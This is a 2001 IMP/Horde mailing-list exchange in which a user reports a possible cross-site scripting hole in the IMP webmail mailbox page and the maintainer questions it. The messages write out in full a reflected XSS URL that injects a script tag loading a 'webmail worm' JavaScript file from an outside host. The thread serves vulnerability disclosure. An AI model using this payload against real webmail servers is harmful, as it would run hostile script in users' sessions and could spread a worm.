[imp] Scripting vulnerability, worm propagation??

Neil Johnson njohnson10@yahoo.com
Wed, 6 Jun 2001 11:36:02 -0700 (PDT)


---------------------- multipart/alternative attachment

Maybe a key oversight on my part here..
My original message stated loosely that when I click the link in the email that the javascript is included/executed.  In reality, if I look at the email message I sent myself containing the link - the link is NOT clickable because IMP did not actually link the whole url(the whole url is in the message, but it is not in the link.. part of it is just text in the body of the message).  Is this the correct way for IMP to function therefore handling issues like the scripting vulnerabilities?  
What I should have said in the first message was that if I log into my Horde/Imp server and paste the whole URL http://your.hordeimpserver.com/horde/imp/mailbox.php3?mailbox=INBOX%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd into my browser, the Javascript is executed and I get the IMP inbox in the current browser window by itsself and I get a seperate browser window with the sidesport test page that the Javascript caused to popup.  If I look at the browser html source of the inbox page the Javascript is included.
With that cleared up, is this situation a problem or have I just wasted everyones time and bandwidth with a non-problem?
humbly,
Neil Johnson
Chuck Hagenbuch <chuck@horde.org> wrote: Quoting Neil Johnson :

> I think IMP 2.2.5 and Horde 1.2.5 are vulnerable to similar scripting
> exploits. For more info go to
> http://www.sidesport.com/webworm/index.html(not my site). I have
> emailed an account on my Horde/Imp server the following link and the
> link(the sidesport sample which I modified to point to my Horde/Imp
> server) seems to include in the source/execute the javascript. 
> http://your.hordeimpserver.com/horde/imp/mailbox.php3?mailbox=INBOX%22%3E%
3Cscript%20language%3D%22Javascript%22%20src%3D%22http%
3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Things look properly escaped to me. What evidence did you see of javascript 
being included/executed?

-chuck

--
Charles Hagenbuch, 
Black and white and grey, all the shades of truth.

-- 
IMP mailing list: http://horde.org/imp/
Frequently Asked Questions: http://horde.org/faq/
To unsubscribe, mail: imp-unsubscribe@lists.horde.org



---------------------------------
Do You Yahoo!?
Yahoo! Mail Personal Address - Get email at your own domain with Yahoo! Mail.
---------------------- multipart/alternative attachment--